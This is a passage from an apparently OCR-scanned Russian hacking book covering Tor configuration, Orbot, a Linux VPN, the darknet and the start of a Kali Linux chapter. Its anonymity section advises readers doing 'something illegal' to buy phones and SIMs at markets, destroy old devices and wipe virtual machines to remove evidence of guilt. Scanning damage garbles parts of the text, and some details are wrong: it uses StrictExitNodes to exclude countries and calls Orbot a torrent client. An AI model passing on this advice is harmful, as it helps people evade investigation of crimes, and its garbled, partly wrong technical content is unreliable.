Работая через браузер Тор, первым делом нужно убедиться, правильно ли он работает. Для этого достаточно зайти на любой сайт, показывающий IP-адрес посетителя (например, на myip.ru). Если ты не увидишь свой собственный IP-адрес, все в порядке!

Использовать браузер Tor oчень просто – введи нужный тебе URL и работай, как обычно (рис. 5.4). Поисковые машины не очень любят Tor (по понятным причинам, ведь они теряют свои деньги на тартетированной рекламе), поэтому могут быть проблемы с поиском информации в том же Google.



Рис. 5.4. Браузер Tor

Можно использовать любую другую поисковую систему, которая более лояльна к Tor, или же вводить адреса сайтов напрямую, а не выбирать из результатов поиска.

Несколько рекомендаций по безопасному использованию Tor:

- Не посещай сайты, у которых нет HTTPS-версии, а есть только Тог это лишь инструмент маршрутизации трафика, шифрующий весь трафик внутри сети Тог. Трафик, исходящий из сети, уже не шифруется! Это делает тебя уязвимым, когда твой трафик попадает на точки выхода, ведь там он дешифруется. Поэтому нужно постоянно использовать методы и средства сквозного шифрования (SSL или TLS) и посещать лишь сайты, использующие протокол HTTPS. Не лишним будет использовать плагин HTTPS Everywhere.
- Не качай торренты через Тог. Эта сеть не создавалась для обмена файлами по стандарту peer-to-peer (точка-точка). Скорее всего, на многих точках выхода все это будет заблокировано. Использование трафика типа P2P замедляет скорость работы в сети Тог других пользователей и угрожает твоей анонимности (клиенты BitTorrent отправляют твой IP-адрес трекерам и пирам BitTorrent).



Puc. 5.5. Caŭm tuta.io

- Не указывай свой основной адрес электронной почты. Как сказал один умный человек, "использовать Tor и указывать свой основной почтовый адрес – это все равно, что прийти на маскарад в маске и с бейджиком, на котором написано твое имя". Лучше всего создать почтовый ящик на одном из анонимных почтовых сервисов вроде tuta.io. Разумеется, это следует делать только после подключения к сети Tor, а не до этого (рис. 5.5).
- Не используй Google. Эта поисковая система печально известна тем, что собирает сведения о поведении пользователей и результаты их поисковых запросов, чтобы увеличить собственную выручку. Вместо Google лучше использовать DuckDuckGo.

На рис. 5.6 изображено меню браузера Тог. Оно отличается от стандартного меню Firefox, в нем есть два новых пункта:

• New Indentity – создать новую личность. Стирается вся информация о тебе, в том числе какие сайты ты посещал, установленные Cookies,

создается новая цепочка узлов Тог. В общем, начало с чистого листа. Что-то вроде быстрого перезапуска браузера Тог.

New Tor Circuit for this Site – позволяет создать новую цепочку узлов Тог для текущего сайта, но при этом не стирается личность пользователя. Если ты был залогинен на сайте, то выход не будет произведен, но с большей долей вероятности будет сменен твой ІР-адрес. Как это перенесет сайт, зависит только от него. Подобная команда может быть использована, если нужно просто сменить цепочку узлов, например, когда соединение работает медленно и ты не хочешь уходить с сайтов, а просто хочешь, чтобы соединение работало быстрее. Есть вероятность, что будет выбрана более быстрая цепочка.



Рис. 5.6. Меню брузера Тог

Примечание. Не устанавливай русский язык для браузера Tor. Использование английской версии браузера – это дополнительная маскировка на посещаемых сайтах!

### 5.3.7. Тонкая настройка Тог

#### Установка выходных узлов

При использовании VPN или анонимного прокси есть возможность выбрать сервер, находящийся в определенной стране. Например, некоторые немецкие каталоги запчастей не позволяют войти с русского IP-адреса. Нужен местный – немецкий. В VPN это делается путем выбора локации сервера в Германии. А как же Tor?

В Тог также можно выбрать расположение выходного узла. Для этого открой файл *torrc* (если ты не сменил папку по умолчанию, он будет находиться в папке C:\Tor Browser\Browser\TorBrowser\Data\Tor) в любом текстовом редакторе (Блокнот, Atom, Notepad2) и добавь в его конец две строчки:

ExitNodes {DE} StrictExitNodes 1

В скобках нужно указать код страны, например, DE для Германии, US – для США и т.д. Вторая строчка говорит Тог, что выходные узлы должны быть строго из этой страны. Если вторую строчку не указать, Тог может в некоторых случаях проигнорировать требование ExitNodes.

Примечание. StrictExitNodes 1 – указание, в случае недоступности выбранного сервера, не пытаться подключиться к другому, а выводить ошибку.

Если необходимо задать несколько стран, то перечисли их через запятую:

```
ExitNodes {US}, {DE}, {RU}
StrictExitNodes 1
```

Иногда есть обратная задача. Задать страну, через которую нельзя выходить "в мир". То есть Тог может использовать выходные узлы из любой страны, кроме заданной. В этом случае используй просто один параметр StrictExit-Nodes:

StrictExitNodes {MD}, {KZ}

В этом случае мы не хотим, чтобы наши выходные узлы были из Молдовы и Казахстана. После внесения изменений перезапусти Tor.

#### Фиксирование входных узлов

Аналогично фиксируется и входной узел:

EntryNodes <имя	/зла>	
StrictEntryNodes	1	

Есть еще одна полезная настройка из этой серии – TrackHostExits фиксирует выходной узел (host) для заданных доменов, что позволяет сохранять сессию для тех серверов, которые проверяют IP клиентов. Синтаксис записи такой:

TrackHostExits host,.domain,...

#### Исключение подозрительных узлов

Стать членом сети Тог и развернуть собственный узел Тог может кто угодно, в том числе наши доблестные правоохранительные органы. К счастью, Тог может решить эту проблему – в настройках можно задать, через узлы из каких стран не должны проходить твои данные:

ExcludeNodes {ru}, {ua}, {by}

Теперь если пытливые ребята с серенькими глазками в РФ, УА или РБ додумаются сделать подставной Tor-сервер и попытаются прослушивать выходные данные, то мы никак не сможем попасть на такой сервер. Примечание. Есть полезное свойство файла torrc. Это комментарий. Тог не выполняет строки в файле torrc, если строка начинается с символа "#". Благодаря комментариям вы можете хранить в файле torrc заготовки, и при необходимости быстро включать их, убрав "#".

#### Запрещаем использовать комп в качестве выходного узла

Представь себе: к тебе врываются ребята с трехбуквенными надписями на спинах и пытаются обвинить тебя во всех смертных грехах, а ты ничего не делал! Кто-то сделал все за тебя, а твой комп просто был выходным узлом.... В общем, чтобы такого не произошло, добавь в *torrc* строчки:

ExitPolicy reject \*:\* # no exits allowed ExitPolicy reject6 \*:\* # no exits allowed

Они запрещают использовать наш сервер в качестве *точки выхода* (*Exit Node*) трафика. В противном случае Тог будет пытаться использовать наш сервер для передачи исходящего трафика сети на внешние серверы. К сожалению, не все используют Тог с благими намерениями, а если трафик покидает Тог через твой сервер, все проблемы и последствия свалятся в том числе и на твою голову.

## Установка прокси-сервера в Тог

Добавь следующие строки в конец конфигурационного файла Tor с заменой <адрес прокси> и <номер порта> (а также <логин> и <пароль>, если они есть) на конкретные значения прописываемого http или https прокси-сервера.

```
# Force Tor to make all HTTP directory requests through this host:port (or
# host:80 if port is not set).
HttpProxy <appec прокси>:<HOMEP порта>
# A username:password pair to be used with HTTPProxy.
HttpProxyAuthenticator <логин>:<пароль>
```



После правки и сохранения файла *torrc* необходимо перезапустить Тог. Для проверки настроек можно использовать Tor-анализатор (зайти на *http://check.torproject.org*).

# Другие параметры конфигурационного файла

Таблица 5.1 содержит различные полезные параметры конфигурационного файла Tor.

Параметр	Описание
EntryNodes nickname,nickname,	Список серверов, которые предпочтительно ис- пользовать в качестве "входных" для установления TCP/IP-соединения с узловой цепочкой маршрути- заторов Tor, если это возможно
ExitNodes nickname,nickname,	Список серверов, которым предпочтительно отво- дить роль замыкающего звена в узловой цепочке маршрутизаторов Tor, если это возможно
ExcludeNodes nickname,nickname,	Список узлов, которые вовсе не следует использо- вать при построении узловой цепочки
StrictExitNodes 0 1	Если установлено в 1, Тог не будет использовать какие-либо узлы, кроме тех, которые присутствуют в списке выходных узлов в качестве посредников, устанавливающих соединение с целевым хостом и, соответственно, являющихся своеобразным замы- кающим звеном в цепочке узлов
StrictEntryNodes 0 1	Если данному параметру присвоено значение 1, Tor не будет использовать какие-либо узлы, кроме тех, которые присутствуют в списке входных узлов, для подключения к сети Tor

Таблица 5.1. Параметры конфигурационного файла Тог

FascistFirewall 0 1	Если данному параметру присвоено значение 1, Тог при создании соединения будет обращаться исключительно на Луковые Маршрутизаторы, у которых для осуществления подключения откры- ты строго определенные номера портов, с кото- рыми позволяет устанавливать соединение твой файрвол (по умолчанию: 80-й (http), 443-й (https), см. FirewallPorts). Это позволит Тог, запущенному на твоей системе, работать в качестве клиента за файрволом, имеющим жесткие ограничительные политики. Обратное утверждение неверно, по- скольку в этом случае Тог не сможет исполнять обязанности сервера, закрытого таким файрволом
FirewallPorts ПОРТЫ	Список портов, к которым твоей файрвол позволя- ет подсоединяться. Используется только при уста- новленном значении параметра FascistFirewall (по умолчанию: 80, 443) (Default: 80, 443).
LongLivedPorts ПОРТЫ	Список портов для сервисов, которые имеют склонность устанавливать особо длительные сое- динения (к ним относятся преимущественно чаты, а также интерактивные оболочки) Узловые цепоч- ки из маршрутизаторов Тог, которые используют эти порты, будут содержать только узлы с наиболее высоким аптаймом (характерным временем при- сутствия в сети), с целью уменьшения вероятности отключения узлового сервера от сети Тог до закры- тия потока (по умолчанию: 21, 22, 706, 1863, 5050, 5190, 5222, 5223, 6667, 8300, 8888).
MapAddress адрес:новый адрес	Когда к Тог придет запрос на указанный адрес, лу- ковый маршрутизатор изменит адрес перед тем, как приступить к обработке запроса. Например, если нужно, чтобы при соединении с www.exam- ple.com была использована цепочка узлов Тог с вы- ходом через torserver (где torserver – это псевдоним сервера), используй "MapAddress www.example. com www.example.com.torserver.exit"

NewCircuitPeriod ЧИСЛО	Каждые ЧИСЛО секунд анализировать состояние соединения и принимать решение о том, нужно ли инициировать построение новой узловой цепочки. (по умолчанию: 30 секунд)
MaxCircuitDirtiness ЧИС- ЛО	Разрешить повторное использование цепочки, в первый раз собранная в определенном составе сво- их звеньев самое большее ЧИСЛО секунд назад, но никогда не присоединять новый поток к цепочке, которая обслуживала данный сеанс в течение до- статочно продолжительного времени (по умолча- нию: 10 минут)
NodeFamily псевдоним,псевдоним,	Именованные сервера Tor (закономерным образом, для повышения степени прозрачности иерархии сети Tor) объединяются в "семейства" по признаку общего или совместного администрирования, так что следует избегать использования любых 2-х из таких узлов, "связанных родственными узами", в одной и той же цепочке анонимных маршрутиза- торов Tor. Специальное задание опции NodeFamily может понадобиться только тогда, когда сервер с данным псевдонимом сам не сообщает о том, к ка- кому "семейству" он себя причисляет, что на сто- роне сервера OR должно быть продекларировано путем указания параметра MyFamily в файле torrc. Допускаются множественные указания этой опции
RendNodes псевдоним,псевдоним,	Список узлов, которые по возможности желатель- но использовать в качестве точек рандеву (встречи)
RendExcludeNodes псевдоним,псевдоним,	Список узлов, которые ни в коем случае не следует использовать при выборе точек рандеву (точек встречи)
SOCKSPort IIOPT	Известить Tor о том, что на этом порту должны прослушиваться соединения, устанавливаемые приложениями, использующими SOCKS-протокол. Обнулите этот параметр, если Вам вовсе ни к чему, чтобы приложения устанавливали соединения по SOCKS-протоколу посредством Tor (значение по умолчанию: 9050)

-----

. . . . .
SOCKSBindAddress IP[:ПОРТ]	Установить привязку к данному адресу для прослу- шивания запросов на соединение от приложений, взаимодействующих по SOCKS-протоколу (по умолчанию: 127.0.0.1). Также можно указать порт (например, 192.168.0.1:9100), который, разумеется, на целевой машине должен быть "открыт" посред- ством соотв. настройки файервола. Определение этой опции может быть повторено многократно для осуществления одновременной ("параллельной") привязки ко множеству различных адресов/портов
SOCKSPolicy политика,политика,	Задает политики входа на данный сервер с целью ограничения круга клиентских машин, которым разрешено подключаться к SOCKS-порту. Описа- ние этих политик вводится аналогично тому, как это делается для политик выхода (см. ниже)
TrackHostExits хост,.до- мен,	Для каждого из значений в разделенном запятыми списке, Тог проследит недавние соединения для хостов, соответствующих этому значению, и попы- тается использовать один и тот же выходной (замы- кающий) узел для каждого из них. Если очередной элемент списка предваряется символом ".", то его значение будет трактоваться как соответствующее домену в целом. Если один из элементов списка со- стоит из одной только "точки", то это указывает на его "универсальное" соответствие всем путевым именам. Эта опция может оказаться полезной, если ты часто устанавливаешь соединение с сервера- ми, которые аннулируют все записи о пройденной тобой аутентификации (т.е. принуждают выйти и зарегистрироваться снова) при осуществлении по- пытки переадресации TCP/IP-соединения, установ- ленного с одним из таких серверов, на твой новый IP-адрес после его очередной смены. Обрати осо- бое внимание на то, что использование этой опции невыгодно для тебя тем, что это позволяет серверу напрямую ассоциировать историю соединений, за- прашиваемых определенным IP, с твоей пользова- тельской учетной записью. Хотя в принципе, если кому-то и понадобится собрать всю информацию о твоем пребывании на сервере, желающие в любом случае смогут сделать это посредством соокies или других специфичных для используемого протокола обмена средств

-----

TrackHostExitsExpire ЧИС- ЛО	Поскольку серверы, являющиеся выходными зве- ньями узловой цепочки, имеют право начинать ра- боту и завершать ее по собственному усмотрению, т.е. так или иначе – произвольным, случайным об- разом, желательно, чтобы ассоциация между хо- стом и выходным узлом автоматически потеряла свою силу по истечении некоторого ЧИСЛА секунд полного отсутствия сетевой активности со стороны сервера. По умолчанию – 1800 секунд (30 минут)
---------------------------------	---

Существующий набор команд Тог достаточно велик. Рассмотрение их всех выходит за рамки настоящего книги. Здесь были приведены лишь несколько наиболее типичных вариантов редактирования и лишь часть команд. Полный список и синтаксис команд (на английском языке) можно найти на сайте Tor.

## 5.3.8. Установка Tor в Android

Torrent-клиент для Android называется Orbot, и загрузить его можно по адреcy https://play.google.com/store/apps/details?id=org.torproject.android

Но установка Orbot не означает, что теперь твое устройство защищено и ты можешь безопасно передавать данные. Отнюдь. Требуется дополнительная настройка.

Запусти Orbot. Ты увидишь большую серую луковицу – это символ проекта Тог. Серая она потому, что смартфон не подключен к сети Тог в данный момент (рис. 5.7).



Рис. 5.7. Приложение Orbot

Нажмите на луковицу. Начнется процесс подключения к сети Тог. Как только соединение будет установлено, появится вот такое сообщение (рис. 5.8).







Рис. 5.9. Какой браузер использовать?

Сообщение гласит, что ты подключен к Тог, но это не означает, что твое устройство безопасно. Также предлагается нажать кнопку **Browser** для проверки твоего соединения. Нажмите ее. Далее тебя спросят, какой браузер нужно использовать – стандартный или Orfox (он более защищенный), см. рис. 5.9

Лучше выбрать Orfox. Далее Orbot отобразит список приложений для работы с сетью Тог. Все эти приложения настроены на использование Тог и не будут использовать соединение с Интернетом в обход (рис. 5.10).

Установи эти приложения и используй их вместо стандартных. Чтобы с Tor заработала какая-то сетевая программа (отличная от Orweb), нужно ее соответствующим образом настроить. Но вся проблема в том, что далеко не все программы позволяют задавать необходимые параметры. Если в настройках программы можно указать параметры прокси-сервера, тогда ее можно "под-

. . . . . . . . . . . . . . . . . .

ружить" с Тог. Просмотри параметры программы. Если она позволяет указать прокси-сервер, то укажи IP-адрес прокси 127.0.0.1 и порт 8118. Можно попытаться использовать режим прозрачной проксификации, он же режим VPN. В этом случае весь исходящий трафик будет проходить через Tor. Но об этой функции нужно знать следующее: для ее работы нужны права *root* и она работает не на всех устройствах. Для ее включения нажмите кнопку VPN (рис. 5.11).

button to install now, or you can find them later on Google Play, at GuardianProject info website or via F-Droid org Orfox: Privacy-enhanced browser that works through Tor ChatSecure: Secure chat app with Off-the-Record Encryption DuckDuckGo Search Engine app Set Twitter proxy to host "localhost" and port 8118 Θ StoryMaker - Make a story and leave it to tor for security Mobile Martus - Benetech Human Rights Documentation 5

Рис. 5.10. Приложения для работы с Тог

Рис. 5.11. Включение режима VPN

# 5.4. VPN для Linux

Данная книга, хоть и для хакеров и опытных пользователей, но и начинающим она будет полезна. А для начинающих важно, чтобы все было как можно проще. Идеально – установил программу, и она сразу работает. В случае с VPN в Linux не все так просто – часто приходится VPN-соединение настраивать вручную, что для начинающего пользователя, который только-только делает первые шаги в Linux, не всегда понятно. Поэтому рекомендуем VPN



от KeepSolid VPN Unlimited, который предоставляет удобный клиент для Linux, работающий сразу после установки.

Скачать VPN-клиент можно по адресу:

https://www.vpnunlimitedapp.com/ru/downloads/linux

Скачанный пакет содержит много зависимостей (для его работы нужно системе установить много других пакетов), поэтому для правильной его установки нужно открыть терминал, перейти в каталог Downloads (команда cd ~/ Downloads) и ввести команду:

sudo apt install ./vpn+unlimited-<версия>.deb

После установки запустить клиент можно так:

vpn-unlimited

При первом запуске нужно зарегистрироваться, а после этого в окне

программу нажать кнопку СТАРТ. VPN-соединение будет установлено за считанные секунды. Большая часть времени, потраченная на настройку VPN-соединения, у тебя уйдет на установку пакетов и регистрацию в сервисе. Бесплатный тестовый период дается на одну неделю, а дальше нужно будет платить. С тарифами можешь ознакомиться на сайте сервиса.

Войді новы	ите под вашим К й для обеспечен	eepSolid ID или создайте ия онлайн безопасности	
6	Введите email		
•	Ввелите пароль		
	obegine napono		A.G
	В	ойти	
f	B	ойти G Google	
f	B	ойти G Google	

Рис. 5.12. VPN-клиент в Linux

## 5.5. Что такое DarkNet?

В этой главе мы говорили о Tor. Говоря о Tor, невозможно не поговорить о DarkNet. Глобальную сеть можно условно разделить на три слоя:

- 1. Видимый здесь находятся обычные веб-ресурсы, сайты, которые можно посетить по обычной ссылке или найти в поисковиках.
- 2. Глубокий здесь находятся сайты, закрытые от индексации поисковыми машинами. Сюда можно отнести корпоративные сети и хранилища, доступ к которым закрыт логином и паролем. Обычный пользователь не имеет доступа к ним.
- 3. DarkNet собирательное название всех компьютерных сетей, предназначенных для анонимной передачи информации. Здесь есть сервисы для торговли, как правило, запрещенными товарами, анонимного общения или обмена всякого рода контентом. Такие сервисы нельзя открыть обычным браузером или найти в обычном поисковике.

Архитектура DarkNet препятствует слежке и контролю за передачей информации. Поэтому, с одной стороны, даркнет может быть орудием против цензуры, а с другой – ширмой для преступлений.

Во многих странах мира использовать скрытые сети не запрещается. Но в самом даркнете происходят многие дела, которые запрещены законом большинства стран. С недавнего времени торговля в даркнете поднялась до невиданных ранее высот – ведь появился анонимный биткоин, позволяющий передавать деньги действительно анонимно. Даркнет превратился в виртуальный черный рынок. Здесь можно купить наркотики, оружие, детскую порнографию, украденные данные (например, украденные номера кредитных карт) и другие товары, которые на обычных сайтах продавать нельзя, иначе гарантированы проблемы с законом.

Попасть в даркнет гораздо проще, чем тебе кажется. Окном туда является Tor. Сайты в даркнете имеют специальные адреса в зоне .onion. Сайты этой зоны нельзя открыть в обычном браузере, только в Tor. Хотя книга и посвящена хакингу, мы не будем публиковать адреса ресурсов с запрещенным контентом сугубо из моральных соображений. Если ты хочешь познакомиться с даркнетом и не знаешь с чего начать, то запусти Tor и перейди на один из этих сайтов:

- Каталог ссылок на популярные сайты даркнета The Hidden Wiki: http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main\_Page
- Facebook: https://facebookcorewwwi.onion
- Международная версия BBC: https://www.bbcnewsv2vjtpsuy.onion
- Поисковик DuckDuckGo: https://3g2upl4pq6kufc4m.onion

Onion-версии Facebook и BBC используются для обхода запрета на доступ к этим сайтам в странах, где они находятся под запретом.

Даркнет помимо своей романтики и духа хакерства и анонимности таит в себе угрозы. Вот наиболее распространенные из них:

- Мошенничество не спеши ничего покупать в даркнете. Получив деньги, аноним может просто не выполнить своих обязательств. Наказать ты его никак не накажешь, поскольку он аноним и вычислить его практически невозможно. Да и если ты решился на покупку чего-то в даркнете, скорее всего, это что-то – незаконное, и ты не будешь об этом никому рассказывать. На это и рассчитывают мошенники.
- Шок-контент поскольку цензуры в даркнете нет, легко можно наткнуться на контент, который подвергнет тебя в шоковое состояние. Особо впечатлительным может даже понадобиться помощь психолога. Лучше приготовиться к этому заранее – в даркнете может быть все, что угодно.
- Действия других хакеров не нужно думать, что у хакеров есть кодекс чести, ну или же не нужно причислять себя к числу хакеров, только если научился пользоваться Тог'ом. Тебя могут банально взломать, чтобы украсть личные данные, платежную информацию и т.д. Правила те же, что и при работе с обычными сайтами, – не переходить по неизвестным ссылкам (а они все неизвестные!) и не открывать подозрительные файлы.

## 5.6. На пути к полной анонимности

Напоследок еще несколько рекомендаций:

1. Старайся использовать анонимные подключения к Интернету. Например, в некоторых странах можно купить SIM-карты без паспорта. Если ты находишься в такой стране, обязательно используй анонимные карточки, а не контрактные стационарные подключения. Современные стандарты связи 4G и в скором будущем 5G позволяют передавать данные с довольно большой скоростью. Карточки, как и устройства выхода в сеть (смартфоны), нужно периодически менять. Чем чаще, тем лучше. Покупать карточки и смартфоны нужно не в официальных салонах, а на рынке. Бывшее в употреблении устройство, поддерживающее 4G, стоит не так дорого – это раз. На рынке вряд ли будет камера, записывающая, кто и когда купил смартфон и SIM-карту – это два. Старые карточки – уничтожай. Старые устройства – в идеале тоже, но можно продать с соблюдением предосторожности, лучше из рук в руки, а еще лучше – уничтожить. Так ты анонимизируешь сам выход в сеть.

- 2. Позаботься о том, чтобы на твоем локальном узле не сохранялось никакой лишней информации. В идеале разверни виртуальную машину VMWare, в нее установи Windows, а еще лучше Linux (она вообще не собирает лишней информации о пользователе). Выход в Интернет нужно производить из этой машины, а твоя система пусть остается девственно чистой. Если занимаешься чем-то незаконным или не совсем законным, время от времени удаляй виртуальную машину и создавай ее заново. Так ты удалишь информацию, которая может послужить доказательством твоей вины. В идеале использовать SSD с них сложнее восстановить информацию. Для HDD используй утилиты вроде WipeInfo для окончательного удаления информации.
- 3. Внутри виртуальной машины используй Tor, а еще лучше VPN + Tor для лучшей защиты.
- 4. Создай почтовый ящик на анонимном сервисе вроде tuta.io и используй его для переписки. Желательно менять время от времени и почтовые ящики.
- 5. Не используй мессенджеры, использующие привязку к номеру телефона. Пример мессенджера, который не требует номер телефона при регистрации, Wickr Me.
- 6. Для обычной и анонимной жизни используй разные пароли. Пользователи имеют вредную привычку использовать один и тот же пароль на все случаи жизни. Привычка пагубная и может плохо закончиться.
- Расчеты в сети (оплата услуг того же VPN-провайдера) производи исключительно с использованием Bitcoin – так есть шанс остаться незамеченным.

Соблюдение всех этих правил вряд ли сделает твою работу в Интернете комфортной. Но никогда безопасность не бывает комфортной, и об этом нужно помнить.

# Глава 6.

# Что такое Kali Linux и как его использовать для взлома

# 6.1. Вкратце о Kali

Kali Linux – это еще один дистрибутив Linux. С технической точки зрения он основан на Debian, и если ты до этого работал с Debian или Ubuntu, то большую часть знаний можно применить и к Kali Lunux. Дистрибутив Kali создан для продвинутого тестирования (ага, для тестирования!) на проникновение и аудита безопасности.

Kali содержит несколько сотен (более 600) инструментов, ориентированных на различные задачи информационной безопасности, такие как тестирование на проникновение (Penetration Testing), исследования в области информационной безопасности (Security research), компьютерная криминалистика (Computer Forensics) и обратная инженерия (Reverse Engineering).

Дистрибутив Kali Linux разрабатывается, финансируется и поддерживается Offensive Security, лидирующей компанией в сфере обучения информационной безопасности.

Когда-то для подобных целей использовался дистрибутив BackTrack Linux. Kali Linux является продолжением этой платформы. Первая версия Kali увидела свет в марте 2013 года. Это не просто обновленная версия BackTrack Linux, а полностью переработанный дистрибутив, из которого удалены все неэффективные инструменты, инструменты с дублирующимся функционалом (то есть в Kali не будет двух инструментов для взлома Wi-Fi, и тебе не придется ломать голову, какой из них лучше), добавлены новые и актуальные программы.

В настоящее время Kali Linux активно развивается. Это относится как к инфраструктуре проекта, дистрибутива, так и в отношении "хакерских" программ – они непрерывно обновляются, добавляются новые качественные пакеты программ.

Вообще, Kali спроектирован для профессионалов в сфере тестирования на проникновения и аудита безопасности. В этом дистрибутиве сделано много изменений, отражающих данные потребности. Данный дистрибутив не рекомендуется использовать пользователям, которые ничего не знают о Linux, – им будет сложно, также он не подойдет для настольного применения – как основной дистрибутив на каждый день. В нем не будет ни графического интерфейса, ни офисного пакета и т.д.

Также нужно понимать, что Kali – не совсем OpenSource. Команда разработки мала и состоит только из доверенных лиц, пакеты в репозиториях подписываются как индивидуальным комитером, так и командой, и – что важно – набор вышестоящих репозиториев, из которых берутся обновления и новые пакеты, очень мал. Добавление репозиториев, которые не были протестированы с Kali, в источники программного обеспечения – это верный путь к проблемам. Другими словами, лучше использовать Kali как есть и не пытаться добавить в нее новые источники пакетов.

Kali Linux отличается от прочих дистрибутивов Linux, а также имеет специфические черты даже в сравнении с другими "хакерскими" ОС. Рассмотрим особенности этого дистрибутива:

- Содержит более 600 инструментов для тестирования на проникновение. Читай так: 600 инструментов для проникновения в систему! Все инструменты поддерживаются в актуальном состоянии. Они проверены и работоспособны. Регулярно добавляются новые эффективные и получившие широкое признание инструменты.
- Бесплатный, был, есть и будет! Дистрибутив Kali Linux, как и BackTrack, совершенно бесплатный и всегда таким будет.
- Криминалистический режим Kali Linux. Один из режимов загрузки (Forensics). Отлично подходит для сбора цифровых доказательств. В этом режиме Kali не монтирует какие-либо диски (включая swap) – ты не можешь случайно оказать воздействие на исследуемую систему. А хороший набор криминалистических цифровых инструментов делает Kali хорошим выбором для твоей работы по цифровому исследованию и сбору доказательств.
- Сетевые службы по умолчанию отключены. Kali Linux содержит систему хуков, которые по умолчанию отключают сетевые службы. Это

позволяет нам устанавливать на Kali Linux различные службы, при этом позволяют нам сохранять дистрибутив по умолчанию безопасным, независимо от установленных пакетов. Дополнительные службы, такие как Bluetooth, также по умолчанию в черном списке.

- Современное пользовательское ядро Linux. Дистрибутив Kali Linux использует современные версии ядер, пропатченные для беспроводной инъекции.
- Минимальный и проверенный набор источников приложений. Ключевой концепцией Kali Linux является поддержание целостности системы. По этой причине количество источников, из которых Kali получает программное обеспечение, сведено к минимуму. Многие новички в использовании Kali прельщаются добавлением новых репозиториев в sources.list, что приводит к серьезному риску поломать Kali Linux.
- Один пользователь, намеренный доступ root. Из-за природы аудитов безопасности, Kali Linux создан использоваться в сценариях "единичный пользователь root". Многие инструменты, используемые в тестировании на проникновение, требуют повышенных привилегий. И хотя правильные политики допускают включение привилегий root только когда это необходимо, в случаях использования Kali Linux этот подход был бы обременительным.
- Поддержка широкого диапазона беспроводных устройств. Частой проблемой дистрибутивов Linux является поддержка беспроводных интерфейсов. Kali Linux собрана для поддержки такого количество беспроводных устройств, какое только возможно, это позволяет системе правильно работать с разнообразным железом и делает ее совместимой с рядом USB и других беспроводных устройств.
- Поддержка ARM устройств, в том числе Android. Kali Linux может работать на RaspberryPi и многих других ARM-компьютерах. Для них подготовлены специальные образы.
- Поддержка шифрования системы. Вы можете создать флешку Kali Linux Live USB с зашифрованным разделом LUKS, с полным шифрованием диска, с шифрованием диска Raspberry Pi 2. Также имеется уникальный функционал LUKS Encryption Nuke, он заключается в том, что ты немедленно можешь удалить ключи для зашифрованных данных, и эти данные станут абсолютно недоступны. Тем не менее, если ты сделал резервную копию ключей, позже, в безопасной обстановке, можно восстановить доступ к этим данным.

- Kali Linux Live USB с несколькими разделами хранения данных. Загрузочный диск или флешка Kali USB могут иметь один или сразу несколько разделов для хранения данных, с несколькими хранимыми профилями. Для всех них также поддерживается шифрование.
- Разрабатывается в безопасном окружении. Команда Kali Linux это маленькая группа индивидуумов. Только они доверены работать с пакетами и взаимодействовать с репозиториями, вся эта работа осуществляется с использованием нескольких протоколов безопасности.
- Подписанные GPG пакеты и репозитории. Каждый пакет в Kali Linux подписан каждым индивидуальным разработчиком, который создал коммит, репозитории впоследствии также подписывают.
- Совместимость с FHS. Kali придерживается Filesystem Hierarchy Standard, т.е. "стандарта иерархии файловой системы". Это позволяет пользователям Linux с легкостью определять расположением бинарников, файлов поддержки, библиотек и т.д.
- Образы Kali Linux Amazon EC2 AWS. Kali Linux доступен в облаке. Например, образы Kali Amazon EC2. Можное легко настроить Kali Linux в Amazon Elastic Compute Cloud, если тебе нужно соединение с серьезной пропускной способностью, дисковое пространство или мощный графический процессор.

Примечание. С чего начать изучение информационной безопасности? Это на случай, если ты серьезно задумался этим заниматься, и тебя интересует не только как хакнуть соседский Wi-Fi, чтобы не платить за Интернет. Говоря про изучение Kali Linux, обычно подразумевают работу с программами. Хотя операционная система Kali Linux имеет много интересных моментов для изучения (создание пользовательского ISO, установка на сменные носители, шифрование постоянных разделов и очень многое другое), но и без их понимания можно смело пользоваться системой. Поэтому эти вопросы отходят на второй план. В первую очередь начинающих хакеров интересует работа с инструментами. Намного проще будет работать с инструментами, если у тебя есть опыт и знания по администрированию системы Linux, понимание "матчасти" (знание технических аспектов IT-технологий) и знание одного или нескольких языков программирования. Чем больше знаний по этим вопросам – тем лучше. Тем не менее, можно начать с абсолютного нуля – далее в этой главе будут приведены несколько примеров, что можно сделать, впервые загрузившись в Kali Linux.

# 6.2. Где скачать и как установить Kali Linux

Загружать Kali Linux нужно только с официального сайта. Не используй версии, размещенные на других ресурсах. Дистрибутив полностью бесплатный, и нет надобности качать его где-либо еще. Не забывай, что в неофициальную версию могут быть внесены изменения. Какие именно – известно только автору сборки.

Если ты собираешься устанавливать Kali Linux в виртуальную машину, то обрати внимание на готовые образы:

https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

Такие образы очень эффективны, поскольку они позволяют попробовать и даже использовать Kali Linux без установки на физический комп. Тем не менее, там могут быть довольно устаревшие версии, поэтому мы рекомендуем скачивать обычный ISO.

Образы ISO можно использовать в качестве Live-систем, а также производить с них установку. Эти образы можно скачать на странице:

https://www.kali.org/downloads/

Далее будет показано, как скачать ISO-образ и создать виртуальную машину VMWare, в которой мы произведем установки Kali Linux.

Итак, перейди на https://www.kali.org/downloads/ и загрузи один из образов:

- Kali Linux 64-bit (Installer) инсталлятор. Подойдет, если ты сразу хочешь установить систему на физический или виртуальный компьютер. Скачай именно этот образ – ведь мы же хотим установить ее для постоянного использования.
- Kali Linux 64-bit (Live) "живой" образ, позволяющий попробовать систему без ее установки на компьютер. Этот же образ подойдет для установки на USB с помощью Rufus: просто подключи к компьютеру чистую флешку объемом 8 Гб или более, запусти Rufus и создай загрузочную флешку. С нее ты сможешь загрузиться и сразу использовать Kali Linux.
- Kali Linux 64-bit (NetInstaller) сетевой установщик, для установки системы по сети.

Обрати внимание – колонка слева (самая первая) содержит прямую ссылку на ISO-образ. Колонка Torrent содержит ссылку на Torrent-файл. Для загрузки образа через Torrent тебе понадобится Torrent-клиент. Можешь использовать uTorrent или любой другой.

Official Kah Linea Desintesi						
	KALI			1	Blog Downloads Training Documentation	Community About Us Q
1.1.1	Download Ka	ali Lin	ux Ir	nag	jes	NEW FOR 2020
-	We generate fresh Kali Li provides the links to dow Releases page. Please note Downloads are <b>rate limite</b>	inux Image nload Kali L e: You can fi td to 5 conc	files ever linux in it nd unoffi urrent co	y few is lates cial, un ennect	monahs, which we make available for download. This page o official release. For a release history, check our Kall Linux tested weekly releases at http://cdimage.kal.org/kall.weeklyr. DOMS	A orren og en alle
10 33	Image Name	Torrent	Version	Size	SHA256Sum	
